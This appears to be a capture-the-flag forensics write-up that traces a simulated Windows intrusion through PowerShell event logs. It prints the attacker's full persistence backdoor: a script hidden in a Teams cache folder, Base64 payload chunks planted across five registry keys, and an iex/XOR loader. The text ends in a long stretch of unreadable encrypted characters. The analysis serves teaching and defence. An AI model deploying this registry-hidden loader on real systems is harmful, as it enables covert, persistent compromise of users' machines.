Forensics
Meowrine Corp
Challenge
A hacker recently got access to the computer of a high ranking admiral of the meowrine corp. We managed to kick him out and made sure nothing was stolen. However something weird has been going on over our network now. We suspect it is related to the recent hack so to help you, I’ve given you the logs during the hack and the network capture. Can you trace back the events that happened?
Solution
Traffic analysis reveals that a large amount of data was uploaded from 192.168.18.84 to 192.168.18.76. This could be information exfiltrated by the attacker.
Investigating the logs, critical information was found in Microsoft-Windows-PowerShell%4Operational.evtx.
A persistence backdoor was discovered in Event ID 20:
$script = '$k=@("HKCU:\Environment","HKCU:\Console","HKCU:\Keyboard Layout","HKCU:\Control Panel\Desktop","HKCU:\Control Panel\Accessibility");$n=@("boot","update","load","install","exec");$s="";0..4|%{$s+=Get-ItemPropertyValue -Path $k[$_] -Name $n[$_]};iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))'; $p = "C:\Users\Whiskerstein\AppData\Local\Packages\MicrosoftTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\Default"; $f = Join-Path $p "restart.ps1"; if(-not(Test-Path $p)){New-Item -ItemType Directory -Path $p -Force|Out-Null}; Set-Content -Path $f -Value $script -Encoding UTF8-
Creating the Backdoor Script File:
$p = "C:\Users\Whiskerstein\...": Defines a seemingly normal path, hiding the malicious file within a legitimate application’s folder to evade detection.$f = Join-Path $p "restart.ps1": Defines the backdoor script’s filename asrestart.ps1.if(-not(Test-Path...)){New-Item...}: Checks if the path exists, and creates it if it doesn’t.Set-Content -Path $f -Value $script...: Writes the string content from the$scriptvariable into theC:\...\restart.ps1file.
-
Backdoor Script Logic (the
$scriptvariable):$k=@("HKCU:\Environment", ...): Defines an array containing five registry paths.$n=@("boot","update","load","install","exec"): Defines an array containing five registry value names.$s="";0..4|%{$s+=Get-ItemPropertyValue ...}:- Reads the value of
bootfromHKCU:\Environment - Reads the value of
updatefromHKCU:\Console - Reads the value of
loadfromHKCU:\Keyboard Layout - Reads the value of
installfromHKCU:\Control Panel\Desktop - Reads the value of
execfromHKCU:\Control Panel\Accessibility - Then, it concatenates these five retrieved values into a single long string,
$s.
- Reads the value of
iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))):[Convert]::FromBase64String($s): Decodes the concatenated string$sfrom Base64.[Text.Encoding]::UTF8.GetString(...): Converts the decoded bytes back into a UTF8 string.iex: (Invoke-Expression) Executes this string.
Instead of writing the full malicious code directly into the .ps1 file, the attacker Base64-encoded the payload, split it into five parts, and hid each part in five different, seemingly harmless registry values.
Next, while examining the rest of the logs, traces of the attacker using PowerShell to write malicious content to the registry were found:
- boot (from Event ID 14)
New-ItemProperty -Path "HKCU:\Environment" -Name "boot" -Value "JHg9MTA5OyRjPSdTUjlOVUVvVkNBUVJSRVJLU2xrN09neFZBVDRtVkFFRUl4VWFQaVlVR2dRTUJnb1VOeGdCQUE1ZEl3TTBYQ01CSVFJL0xpWUJQelVJTGxRcU8xc0NPVFZkSnpVM1gxaGZEeWtaWEFnZEpEazlId0lxSjFvS0tna0RXRG8zSUZndURBWThKUThaQWlvbldpdzVQUncvTGlZVVZBQTNBaXdvSmdOWU9nd1VQMTQ0WFR0ZlB4Z0dPRDRwSXpzOFd3STVOUU5ZT2d3R1ZGODBHRHNHSVYwRk5UYzRXRDRQQVQ5ZURsZ2pYRHBhWFRVbUZWMHVERjBKQUE4QkZRWWhBajh1SVJvS0ZEY1lBUUFPWFNNRE5Gd2pBU0VDUHo0OUFqOFVDQjBzT1RjWVhBUWdBUW9xQ1FOWU9qY2dXQzRNQmdvRU54MFpCdzRHWFNrTUJoNDVDeDhlTGc0R0hqa21IVDgrSVFJL1hqY1lPeW81R0NBbEp4NG9LU1lZQVRvNVd3STVOUUkvTlRRakdUczlId1lxSjFwZFhqUUdYUmNtSFQ4VUloMGdLaWNlQmlvbkFnNEFEeDBuSlFrWEp6b0pPVmdVRGdaZEZ5WVVQeFFJSFN3cENRTmNGRFFHQ2dRM0hSazVKaDAvUGlFQ1AxNDNHRHNxT1JnZ0pTY2VQQ1VuQWxrNkRDTWRCeUlKQlNvSkJWeGRPbFFnS2lkYVhWd2dBU3dsSnc4QkZDQWVKQ2toRlFvdVBGUThKU2RhQVM0TVhRa0FEd0VWQmlFWFB5NEpIbHcrREFZS1BqY2VBU29NWGhrcElGUXNKU2RhTERrOUhUOFVJZ01PUGowVVB4UWlBd1lxSURzbk9TTUdDUWMwUEFrcElnYzNGejBYTkNraldnNDVJRjgzT1NBWE5DazNIdzRwTnhVT0J5TUdDVGtqSXpjNUl3UUpCejhCTnpraUx6Y3BJem9KT1NjQk53YzNCVFFYSUJjOEtTQllEaGMwT2pjcEl4OEpPUTRCTnpraldqUVhORG8zS1NOWU5CY2dXanNwSUFvbk9RZ0JOd2MzQ1RjNUlnVTNCenBkRGhjZ0h6YzVJQTQvQnlZVURnYzNIelFISUFFSk9TQVVEamtqWFQ4cE53RW5LVDBhSkRralhqY1hJQmczRnlRVURnYzNHalFISXhrL09UZ0dKeWtnSGljNU5BQUpGemdHTndjak9na1hJRDgzT1NaZEpDa2dGU2NwTnpzM0J6ZGNOQ2tqWHc0NUlnOC9LU1lHSnprakZ6Y0hJd0VPRnpVQU55azNYalE1SXlFM0J3a1VPQWMwRkE0NUlpOG5GemtGQ1NrM05UY0hJeUlKQndnWE5Da2pHQ1FwSUNrbkZ6cFpOQ2tqR3drNUlBRTBCeVlhT0NrM1hDY3BJd1lKRndrWERqa2pSalFwSXgwNEZ5TlpKQWNqRkRjNUlrWTNPU01FSXhjME9EY1hOQUkwS1RoY0RqazNJejhwTng0bkJ3OWREamtqR2c0SE55dy9Gd2dIQ1RrakJEUTVJd01KQnd3Qk56a2lHelFwSTE4T0J3a0JOd2MzWFRjWElEby9PVHhZRGhjME9qY3BJMW9KRnlNQk56a2pJRGNYTkNFM0Z6NVlOQmNnSERncElDUW5PVGNCTndjM0ZUYzVJZzQzQnpoZERoY2dMRGM1SUFjOE9UVVVEZ2MzWHpjSElDWUpLVG9VRGprak56OHBOd1luS1F3YUpDazNSZ2s1SWh3bk9UZGZORGtnTkRjNUl6dzNPU01IUHlrM0J5Y3BJQWNuRnpzRkNTazNRalFISTE0T0J3a1hOQ2tqT2ljcElCa2tGemxaTkNrakRnazVJQVEzRno0YU9DazNIaWNwSTFVSktRbFlOQmMwQmpjcElBQUpGenNYT0NraUppY3BOd2dqQnlNVUpEa2pHRGNwTng4M09Rc1ZORGszS2pjNUl4VTBPUTRITnpraVhUUUhJMTA4S1FzR0p5a2lWRHNISUQwbk9UNEVDU2tnSFQ4cElCc2tGejhYRGdjZ1dnNDVJeWMzQnlSZE5Ea2dSalE1SXpjM09UVlpQQ2szSlNjcElGa25LVDRVSkNrM096YzVJRmczQnlCY05BY2dCd2twSXhnT0J6Z1hEaWszR0NjcEkwWUpCelJjTkNrakFna1hJQXczRnowQU53YzNJU2M1TjE0MEJ5WUFOemtpS3pjcEl3VU9PU0FWTkJjZ05UYzVJaU0zT1RzSE55a2dCd2twSUJVT09Ud1ZOQWNnUHljcElDRW5PU0JjTkNrZ1d3azVJanNKQnc1ZE9Da2pHQTQ1TndBM0tUNWNOQ2tqS2drNU4xdzBPU2N" -PropertyType String -Force- update (from Event ID 10)
New-ItemProperty -Path "HKCU:\Console" -Name "update" -Value "BTnhjZ0dEOHBOeWduRnpnYUpEazBGUWtwTjE4M09RdGZEaGNnSGpRcEl6VW5LU0lhSkRralhqY1hOQnMwQnpWWU5BY2pIejg1TjFrM0tUUllQQ2szWENRcElCZ25CeVJkRGhjZ0RBa0hOeFUwQnljYU9Da2dDQ2NwSTFzMEZ3NEFOeWtpQVRRcEl4Z0pLUWxjTkNrM0FUOHBOeGNrT1NBYUpBY2dDU2NwSTFRM0tTSVZOQWMzSnpjWE5CazBLU0lhRGpralBBa0hOMFlrRnc0YUlDa2lGU0FwSUFrak9TTlpJRGswWHlNSEl4b2pPU1JlSURrM1ZTY3BJaHdnT1NFVklEazNDQ2NwSWxzaktRbGZJRGtnSmlNNU53Y2tLVGdVSURraU9pTTVJQWtqQnowQUp3YzNIU1E1TkFJaktTY2FEaWtqV0E0cEl3UU9PVHBaTkFjZ0JpUXBJRmdrS1F4WU5BY2dYdzQ1SXhjNEZ3Z0dKeWtnSHljSElCd0pLVDFlRGpraUFqUUhORDhqRnpSY05Ea2pSZzQ1TndNM0Z6aFlOQ2tqUGdrNU56YzNLUXdBTnhjZ0t6ODVJam9KS1NZSE55a2pEQWs1TndRM0J5ZGNOQmMwWERRNUlsazNCemtYT0NrZ0J5YzVOeGcwS1E4QU56a2lCamNwSTFVSkJ3Z1hORGtnWEQ4SElCc0pPU0FBTndjZ1d3a0hJQ29KS1RSY1BDazNYaVFwSUY0a0tRNWNOQmNnR1RRSElBZ0pCd2tBTndjakNUOHBOeWduT1NRYUpEazBYalFITkFvM0J5TmRORGtnUGpjcEl3ODNGd2tYRGprM05UY0hJd1UzS1RSZEpDa2dIeWNwTnlJM0Z6VmNOQ2tqSVFrNUlsODhPU0lHSnpralh6UUhJeWtKT1QwQU55azNSamM1SXljM0Z6a1VPQWMwRnlBNUlrSWtGd2dYRGprakJUUXBJeThKS1RkWURnY2dPVDhwSXgwMEZ3NWNORGszUERjNUlqbzNGeUlVTkNrM0FEY0hOeXczQnpnWE5Da2pYaVFYTkNBbktUc0ZDU2szRHpjSEl3Y0pCeVFYTkNralZTY3BJZ1VuT1NBWERqa2pMemNwSXpvSk9UbFlEZ2NnRGo4WE5DQTNCemtITnprZ1d6dzVJeGszQnpWZERqa2lHRFFISUJrT0J5ZGVPRGswQWlNNU5Da2pGd2dHT3prakN6Y1hORjgwT1FoWU5BY2pGRHc1TndrbktUY0FQemtpWFQ4NU4xb2tPVDhHTnpralhEY3BJd1FPRno4WERqa2lBQTRYSUZ3N0tUUUVPd2MwV1NBNUlCUTNCelFHTnlrakNEY3BJd1VrT1FnRUp3Y2dGelFwSWxVM09TRmVORGtnSHpRSElGNDNCenRlTkRrZ0ZUUXBJeFFuT1RVRUp3YzNYemNISUFZSk9UdGNOQWMzR2pRNUlBd0pPU0FhRGlraldpUXBOMXNqS1RzWERqa2pYalFwSXlzSk9UeFlEZ2NnWFQ4cEl3bzNPVDVjTkRrM0FqUTVJaVEzT1NNVU5DazNIelFITngwME9UNFhOQ2tqR1NRSE5DY2pGeVpZSkNraUhTUTVJeDAwT1RRWERnYzNIemNwSUFjSkJ3NFhEamtpQmpRcEl3WThCendCSnhjZ0ZRazVJQmszRnc4Vk5EazNORGNISXdFMEJ5Y1ZOQ2szUmpRcEl6VTNCeVJkSkFjMEJDQTVJbHNrRno5Wk5Da2pBUWtYSXlRM09RZ0JOemtqWGpjWE5GUS9CeUlCSnhjZ0h3azVOMXcwQnljRU54YzBXRFE1SURjM0J3OEJOd2NqQXpjcEkxUTNCenBkSkJjMEFTUXBJRHNqRndrSEp4Y2dCZ2s1TnowM09UUUVOeGMwRGpjNUlDbzNGem9CTndjalZEY3BJeGcwS1NOZEpDa2lIU2NITkZrM0Z3a1hOQWMzSFRRWE5CVTNPVDhVUEJjMENUYzVJQ2MzRnprQk56a2lIVGNISXhvL0J6OEdOd2NnV3c0SE53QTNCeU5mTkJjZ1h3NDVOMTQzQnd3Vk5BY2dSZ2twSXhzNEZ6Y0JKd2NnSVFrSE56dzNPVHBkRGlrZ1ZBNDVJaHdPS1R3VURoY2dBalE1TndBMEJ3NWNOQ2tqQnljcE55UWpGeUFVTkNraUJEUVhJeDgwQnowVk5BY2dWRGNYSXhjMEJ3a1ZOQ2tqWGljSE5Ca2dLU1pZSkRrMEF6Y0hOQ2szQnpWZE5Ea2dBemNwSXdJM09Ud1hEamszQVRjSEkxczNGd2xkSkNraVhDY1hJQVFPRnlOY05Da2pIUWs1SWlNSk9RNFVQQmMwTHpjWE5EZzNLUThWUE" -PropertyType String -Force- load (from Event ID 16)
New-ItemProperty -Path "HKCU:\Keyboard Layout" -Name "load" -Value "NralZEUTVJQUkwT1F0Y05BY2dCRHM1TkE0akJ6c0ZJeWszQURnNUkxODNGenNITnpraU5UY0hJd2cvS1NZQkp3YzNDajg1SWhrOEJ5UUJKeWszQlRRNUl4MDNLVHRkRGhjZ09BazVJZ0lKS1FzWE9BYzBBRGdwTnhzakZ6c1hEamszWHpjSE5CYzNLVDBITnprZ0FUUTVOMXMwQnpSZk5Da2pLRGNwSXdBbkZ6NEVJemtpT3ljcElsc2tPVDBVRGdjM1JqUXBJMVVKQnc4YURqa2lId2tISUNnSkJ3c1hORGszWGpRNUl5dy9PVHhjTkNrakhnazVJQmMwRnpwY05BY2dPZ2tYSUVZL0Z5UUJKeGNnV1E0NUlCazNCeWNWTkRrM0tqY0hJd1EzS1RjVk5DazNJemNwSTFvMEtUVmRKQ2szSGlNSElCNEpPVDBBTnlrak9Ba3BJQm9KQnpsWURnY2dCQWtYSUZvME9RZ0JOemtqRkRRcEl4b25GemdFSXprZ09UY3BOeWczQndsZE5Da2pRaVFwTnl3akZ6UmZPRGtpVlQ4NU53b25GeU1YRGprZ0dEUTVJQTQzS1E0Qk53Y2pYalE1SUZzMEZ6b0dOeWtqSERRcEkxMG5GejhFSXdjM0d6UUhJRndKS1QxY05BYzNJemM1SUFBSktUb2FEaWtqWFNRcE53QWpGd3hZRGprakhUUUhORHcvQnc0Qkp4Y2dCZ2s1SURrM0J5SVZORGszRHpjSEkxazNPUWtWTkNrM1ZEY3BJejAzT1NaZEpBYzBPU001SWtZa0tRaFpKRGtqRnpRcEl3SU9CemdWTkRrakJUUUhJQThKS1NNWFBEazBXaUE1TkFNak9Ud0dPeGNnT0FrNUkxVTNGd2tWUERrM1JpUTVJaXNKRnpSWk5Da2dYUWs1SUFJM0Z6VVVEaGNqQWpjSE56UTNPVGxkRGlrZ0pnazVJZ1FPT1RRVURoY2dIVDg1Tnh3bkJ3aFlEaWtqR3drNUloazBGd3dVRGprald3NFhJRGMzQnlCY05CY2dGVGc1Tnlrbk9UUUdOemtqQlRRcEl3VUpGeUFYRGpraUtRa1hJQ003S1NjRU95azNPQ01YSUFVSktUb1ZORGtnQlRRNU54ZzNPVHRmTkRrZ0NqY3BOeGMzS1R4ZE5Da2pCQ2NITkFVZ0J6aFlKQ2tpQkNRNUl3azNGejhYRGdjM0JqUXBJQmNPT1NJWERqa2lDVGNwSXpjL0tTTUJKeWszQ3pjcEl3WTNCejFmTkJjZ0dna0hJeW8zQnpnRkNTa2pIU2NITkFJZ09UUllKRGtnQnpjcE54ZzBGdzlkTkNralJpUXBJaGtuRnlJWERqa2pBVGNwSXlnSktTZFlEZ2NnRkQ4cEkxc0pPVDFjTkJjaldUODVOMW9rQnlZR055a2pXVFFISXdVMEtROFhEZ2NqSGpRNU5Ca0pPU0pkSkFjME9pTTVJaGduRnpnQU53Y2dGUTQ1SXg0M0J3a0FOemtnV2drcElEb0pLUWxkSkNraUlTY1hJQ0VKRnlOY05Da2pEZ2s1SWc0SkJ5SVVQQ2tqQUE0NUl4ZzBCejllUERrM1h5UXBOeFUzT1RsZE5BY2pEemNYSUJ3T0Z3aGZORGswV0FrcEl4c25Cd2tFSXpraUlDY3BJa0lrS1RWY05Da2pSZ2s1SURvM0tUMWNOQWNnR1FrWElBYzhGdzRGSXprMEZ5TXBOelE3Rno4VURqa2pXalFwSXdVM0J3bFlOQWNqQUFrSE54MDNLVDBVRGlrZ1ZEZzVJMXMwQnc0WE5Ea2lWRFFISXhvT09TWVVEamtqSHpRWElGNDdPVG9BTnlrakhBNHBJQVVKS1Q5WURnY2dKd2tYSUJnOE9TQmVQRGszUGo4SElBVTdPVG9CSnpraUtna3BJajgzRnprYURqa2dWVFFISUJnT0J5TmVOQWMzQURjcEl5Z0pGemNhRGpraUhnNEhJQlFKT1FzWFBEazNHU1E1SWxVSk9UdGREamtpRERjSElCa09GejljRGhjZ0pEYzVJejQzQndzWE9EazNHQ1FwTngwM0Z3eGNOQ2tqQkE0WElGa0pCd2hZRGhjZ0l6c0hORlU0S1RrR0l5azNHelFwSTFrM0tRNWZOQmNnVlFrSEl5NDNPU0lGQ1NraldDY0hOQ3dqS1NkZklEa2dPeU1wSUFrbkJ6UUdPd2MwWFRnNUl3NDNLVFJkRGpraVJnNEhJRGczS1R3YUpDa2pWUTRYSUN3M0J5SmNORGswWERRSElCVTNLVDhBUHlrM0FDY1hJeThKQnpsY05EazNIVDhwTnlRak9UZ1ZOQ2szRlRjcEl6czNGd2xkSkFj" -PropertyType String -Force- install (from Event ID 12)
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "install" -Value "MFZTQUhJd1FnT1RVVklDa2dOU2NwTnlJN0Z3NEVPemtqRGpjcEkxd0pPVDVZRGdjZ1hqY3BJRGNuRnp0ZERoY2dKRGM1STFrM0tRZ0ZOd2NnVlRRSE54NDhLUXdHSnhjakJ3azVJd1UzRnpRQlB5azNJeU1ITndVMEJ6Z1VEamtqRERjSE53QTBLVDRWRGlrZ0t3a3BJeGNrS1FzRUNUa2lXQ2M1TkJnM0Z3NEVOeWtqS2pjNUlBczNGemRkTkJjZ0NnazVOd2MwQnlSZk5Da2pLaWNwSUJvbkZ5TlpOQ2tqWGc0NUlDODNPU01hT0NrM0JDY3BJeUlKQnprWERqa2pBVFFwSXg4NEJ5SlpKQWNqQVRjNUlqMDNCeVlFSXpralhUUTVJeGdKS1RnQk56a2lJRGNwSXhvSkZ5RUJOd2MzV2pRWElBYy9GejlZRGhjMEpEY3BJelVKT1NFQk56a2pKRGNYTkFJM09TQllOQmNnTnpzcElBUWtGeU1CTndjM1dqUTVJa0kwRnc5ZERoY2dGelE1SUJ3OE9TUVVEZ2MzT3pjSElGUU9PU1lVRGpraktUOHBOMVFrT1RRYUpDa2pEd2tYSUQ0SkZ5WmNOQ2tqSWdrWElDWUpPU0lWTkFjalBEOHBJQThuS1RRSE56a2pIalFISTFVT09TZGNOQmMwUHo4NU4xZzNGelFBTnpraU9UY1hJQjBPS1Q0WERqa2pJVGNISURzSkJ6MGFEaWszWFRjSE53TTNCeVFYUENrM1hpUXBJQWduRnpvRk53YzBMamNwSXdrM09Rc1ZOQ2tqSlRjWElEc0pGeVFCTndjalhEUXBJMVFuT1R3YUpDa2lBemNwSXhrSkJ6OFZOQ2tnT2pzNU4xbzNGemdBTnpraVBqY3BJeVFKQndzVk5EazNXelE1SWpRM0J6UmREaGNnS0FrNUl6czNPUTVkUENrM0FTY3BJQVFuRnpwY05BY2pPQWs1SWpvM0Z6OVpOQmNnRHpjSElGNE9CejhWUENrM0JpUVhJRlVKQndrWERqa2pBRFFISUZzSkJ3NGFEaWszQ2pjSE54VTNLU01YUEJjMFhRNHBOd0VPT1NBVUpDa2dGQWtwTnhnM0J3bGREamszSENjNU5EMG5GemNVSkNrZ1dDUTVJem8zS1Q0RU56a2lWVGNYTkFBM0Z5WmREZ2MzUFRjNU53RTNPU1lHSnlrZ1BDYzVJMXMwQnpvR056a2dGRGM1TndjL0J6a0JKd2MzRlRzcEl5Y25LVGthSkNralBUYzVOeGMzQnowVk5DazNKU2NwSUZza0tRa1VKRGswV3ljcEl3c0pGd3dhRGpraU5EY0hJQVVPS1NZWE5CY2dCQTQ1TnlrM0Z5TVZOQWNnV2c0cEl6MEpCd3dGSndjZ0JTUXBJQmtuT1R4Y05BYzBIamM1SWw4ME9TRUhOeWtqQndrSE53STNPVGtCTnlrM0xDY3BJQXNuQnlOY05DazNDemM1SUJjM0Z5SUJQemszQnlRSE4xUTRPU0ZkSkNrZ0dpUXBJeGczQnowQk56a2dXVGNwTnlZbktUVWFKQWNnSndrNUl3STNCdzRCTnpraVdqYzVJQUkzRnpoZERqazNWVFFITjE0MEtTSVhQQmNnWHdrNUlpNC9GdzhYT0NrZ0NUczVOeUluT1FnQU95a2pHU2NwSUY0bktUeGREZ2MzQWpRNU54czNPUXNHSndjMEhBa3BJem9KS1E4WE5Ea2pYamM1TkFJMEtUc1VOQWMzTno4cE4xa25PUTljTkFjZ0h3azVJd2czS1FsWk5CY2pHRGdYTkIwT0J5ZGNOQmMwR2pjNUloNDBPVFZmUENrM1dTY3BJQVFuRno1Y05CY2dId2tISUZzSkZ5UmNEaGNnT2pjNUl5azNCeUFVT0NrM09DY3BJQlVrS1RVVUpCY2dGQTRwSXljSkJ6Y0JOemtqUWpRcE54bzBLVDFjRGhjZ0FqUUhOeGcwQnc1ZFBCYzBCVHM1SXc0L0J6VUhQemtpWGp3SEl4US9CdzhBUHdjZ0lEc3BJQlU0T1NFVU9Ea2pQajhYSUFZNE9UVmNPRGswV0NNSEl3a0pCdzRCTnprakxEY3BJMW9rT1RrVUpDa2dCeVFwTnl3M0Z3aGNOQ2tqVlE0NUlpTS9PVHRkTkJjMEFEUTVJalEzT1NCWk5CY2dMejhwTjFnbkJ3aGREamtqUERjWEkxNDhPVFFFQ1RraVdnNEhJQlFKQnp0ZERnYzBPaU1ISUFrbk9TY1hORGszRnpRNUl5STNPU0VCSnlraUtEY0hOQ1kzS1Q0Rk53Y2pCVGNYSUE4Sk9UaGRORGtnSHpjNUlCbzNLVGRkSkJjME" -PropertyType String -Force- exec (from Event ID 18)
New-ItemProperty -Path "HKCU:\Control Panel\Accessibility" -Name "exec" -Value "5Uc3BJRUk0T1FzR1B6a2pJRDhwSXlnN09Ra0ZJd2NqV0FrNU54MDBLVDljTkNrakJpY0hJQVlrT1NjR0l6azBEQWtwTnhjMEZ3aGZEaGNnSURjcEl3OG5GejhFSXdjZ0Z5Y3BJRFVKT1QxWU5EazBMQWs1Tnhva0tUcFpOQWMwTGpjNU5GMDNCeVJmTkJjZ1hRa3BJd3MzQndrVk5Ea2dXVGNwSXdVbkJ6Z0hPeWtnSERncE53NC9GeUpjUENrakRqczVOQThqQnd0ZkRqazNGVGM1STBZMEZ6ZGRKQWNnV2lRcE4xb2dCejBGTndjMFd6Y3BJeDAwQno4Vk5Da2pKVGNYSUFJSkJ5RUJOd2NqR2pRcEkxc2tPVGNFSXpraUl5Y3BOeUlKRnlJR096a2lXeVFwSWtZMEZ5UmREaGNqTERjNU54VTNLUXhjTkJjMEl6ODVOd2NrS1NBVVBEa2dDejg1SWtZM0tReFlORGtpUEQ4NUlqUS9LU0JZUEFjZ0lqOEhJQm84T1FzVVBBY2dDajhISUZvOEtTRVZQRGtnQXo4NUlEVS9LUXdWUERrZ1ZUODVJQUUvT1Q0VlBEa2dHVHc1SUJ3OEJ6b1ZQRGtnT1Q4NUlGczhCemdWUERrZ0lEOHBJeGduT1NRYUpDazNQVGM1SXhVT0tUb0dOemtpSVRjcEloVUpPVGtWTkNrM0dEd3BOd1FuT1NjYUpDazNPamNITnp3M0Z6cGRORGszS1RjNUlBRTBCem9VT0NrM09pY3BJMTRKS1RwY05CY2pCandwSWgwbkJ6VUVPd2NnQ3o4NUlDay9GemxZTkRraU9EYzVJancvQnpoWVBEa2lKajhISUFNL09UOFVQQWNnS3o4SElDUS9GelFVUERrZ05EODVJQmsvT1NjVlBEa2dXanc1SUZRL0J5RVZQRGtnSGp3NUlBYzhLU0FWUERrZ1dqdzVJQmc4S1FrVlBEa2dCejg1SUFnL09UdGRKQWMwWHdrcElsNDBCelVYTkRrZ0tqYzVJelUvS1RVVURnYzNIVGNISXgwL0tUa0hDVGtpSmljNUl3a2pPU1lWSURrM0NTYzVOeDhuS1Q4VklDa2lEaWNwSWpjbktTQUJOemtpWHpjSE54czBCemNGTnlrM0xpY3BOdzRqT1E5Wk5BYzBIamM1TkZVME9UMWZOQmNnQXdrcEkxUTBCelFWTkRrZ0tqY3BJd1VrQnlRRUl4Y2pCQ1E1TnhjT09Ua0dDUWMwSHc0cE55dzdCeU1FT3lrM0hpQXBOMThrS1QwRUp3YzNJRHM1SWc0bkZ3eFpKQWNqV0NjNU54azRGemRjSkNrakZTUVhJQ1FuS1Q0YVBEa2dHeVE1TkFjT0J3OVlEaWtpRkE0WEkxb09CeUZmRGprakJRa3BJd29KRnlBWERnY2dDd2s1SUFFSkZ5QWFEZ2MzSFRRNU54YzNGendHTnhjMEFEY0hORG8zQnc0Rk56a2lCelFwSWxrM09UVmVOQWNqRGpjNUkwWTBGenhkTkJjZ05UY0hJQlEwT1NjVk5EazBJRHM1SWdjN0J6OVpPQmNqTkRzSEl6ODdCenRjT0NraldUZ1hJRVk0QnowVU9Ea2dKRHNwSUFVNEtUMEFQemszWGp3cE54OC9GdzhIUHdjME9UODVOQVk4T1NkWVBDa2lLVDhYSXlRL0tRdGZQRGtqQWo4cEkxcy9GemdYUEFjZ0pEODVJRFEvT1FsWUlDa2lCU01YSTFrakZ3bGZJRGtqUHlNcEkxNGdGdzRYSUFjZ0ZTQTVJQm9qT1NNYUlCY2pCaVFwTnlJakJ5UVVQRGtnSHo4NUlrWTBPVGhZTkRraUhqdzVJamcvQndsWVBBY2dLajhISUJjOEZ6NFVQQWNnUHo4SElCbzhCejRWUERrZ0JEODVJQWsvS1RRVlBEa2dKVDg1SUFFOEtRd1ZQRGtnRkQ4NUlBQS9CeVlWUERrZ0xqODVJRjQ4T1RvVlBEa2dWRDhwSTE0bkZ5ZFVJQ1VuU2twRkNnTUVIeGsrV1ZzSUhnd3ZBQUlmSzFkWE1Ca2ZDQnNEQWk1REFBZ1pIaFErTmtVS0F3UWZHVDRaQ0NwRFZTczVPRmRYTUFvREJBa0NEZ01vUXhrVkNEbERBQWdaSGhRK05rcFdTUjgyUUZ4RFEwQkZTUjlESVFnRENoa0ZSREJOUUFjQ0JBTk5Ta3BORVUwRUNCVT0nOyR4ZD1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjKTskcmQ9Jyc7Zm9yZWFjaCgkYiBpbiAkeGQpeyRyZCs9W2NoYXJdKCRiIC1ieG9yICR4KX07aWV4ICRyZA==" -PropertyType String -ForceConcatenating the values in the order boot -> update -> load -> install -> exec and then Base64-decoding the result yields:
$x=109;$c='IMPJDDJJY;:U>&T#>&
7 ]#4\#!?.&?5.T*;[95]'57_X_)\$9=*'Z
*	X:7 X.<%*'Z,9=?.&T 7,(&X:?^8];_?8>)#;<[95X:T_4;!]578X>?^X#\:Z]5&].]	 !?.!
7 ]#4\#!?>=?,97\ 
*	X:7 X.
7])9.9&?>!?^7;*9 %'()&:9[95?54#;=*'Z]^4]&?" *'*' '%	':	9X]&?,)	\4
79&?>!?^7;*9 %'<%'Y:#"	*	\]:T *'Z]\ ,%' $)!
.<T<%'Z.]	 !?.	\>
>7*^) T,%'Z,9=?">=?"* ;'9#	4<	)"7=4)#Z9 _79 4)7)7#	9##79#	?79"/7)#:	9'774 <) X4:7)#	979#Z44:7)#X4 Z;) 
'977	79"7:] 79 ?&74 	9 9#]?)7')=$9#^7 7$74#?98') '94 	87#:	 ?79&]$) ')7;77\4)#_9"?)&'9#7#5 7)7^49#!7	849"/'9	)757#"	4)#$) )':Y4)#	9 4&8)7\')#		9#F4)#8#Y$#79"F79##48744)8\97#?)7']9#7,?	9#49#	79"4)#_	77]7 :?9<X4:7)#Z	#79# 74!7>X4 8) $'977779"78] ,79 <957_7 &	):9#7?)7')$)7F	9"'97_49 479#<79#?)7') ';	)7B4#^	4)#:') $9Y4)#	9 7>8)7')#U	)	X447)  	;8)"&')7##$9#7)779497*79#4979"]4#]<)')"T; ='9>	) ?) $? Z9#'7$]49 F49#7795Y<)7%') Y')>$)7;79 X7 \4 	)#8)7')#F	4\4)#	 7= 77!'97^4& 79"+7)#9 4 579"#79;7) 	) 9<4 ?') !'9 \4) [	9";	]8)#97 7)>\4)#*	97\49' 7 ?)7('8$94	)7_79_ 4)#5')"$9#^7445X4#?97Y7)4X<)7\$) '$] 	74'8) ')#[4 7)"4)#	)	\4)7?)7$9 $ 	')#T7)"47'744)"9#<	7F$ )" ) 	#9#Y 94_###9$^ 97U')" 9! 97')"[#)	_ 9 &#97$)8 9":#9 	#= '7$94#)')#X)#9:Y4 $) X$)X4 _9#8') ' 	)=^9"44?#4\49#F9778X4)#>	9777) 7 +?9":	)&7)#	977'\44\49"Y798) '974) 79"7)#U	49 \? 	9  7 [	 *	)4\<)7^$) ^$)\4 4 		 7#	?)7('9$$94^44
7#]49 >7)#7	9757#7)4]$) ')7"75\4)#!	9"_<9"'9#_4#)	9= 7)7F79#'7984 9"B$9#4)#/	)7X 9?)#4\497<79":7"4)7 77,784)#^$4 ');	)77#	$4)#U')"'9 9#/7)#:	99X ?4 7979 [<9#75]9"4 '^894#94)#;9#74_49X4#<97	')7 ?9"]?97Z$9?79#\7)#?9"  \;)4;4Y 9 747)#7)#$9' 4)"U79!^49 4 ^7;^49 4)#'95'7_7 	9;\4749 	9 )#Z$)7[#);9#^4)#+	9<X ]?)#
79>\49749"$79#4)74749>4)#$4'#&X$)"$9#49477) 	9"4)#<<' 	9 749747#4'4)7F4)#57$]$4 9"[$?Y4)#	#$7979#^74T?"' 	97\4'74X49 777#7)#T7:]$4$) ;#	' 	97=7947479 *7:7#T7)#4)#]$)"'4Y7	474479?<4	79 '7979"7#??7 [7 7#_4 _97^74 F	)#87' !	7<79:]) T9")< 497 4\4)#')7$# 4)"4#4=4 T7#4	4)#^'4 )&X$9474)75]49 7)#79<977#[7	]$)"\' #\4)#	9"#	9<4/7487)<)#T49 49\4 ;94#;#)7 89#_7;79"57#?)&'7
?9"<$')749#7);] 8	9"	)84 8)7#;97_747)=79 497[44_4)#(7)# '>#9";')"[$9=7F4)#U	9"	 (	497^49#,?9<\4)#	9 4:\4 :	 F?$' Y9 7'497*7#7)74)7#7)#Z4)5]$)7# 	9= 7)#8	) 	9X 	 Z4979#4)#'8#9 97)7(7	]4)#B$)7,#4_89"U?97
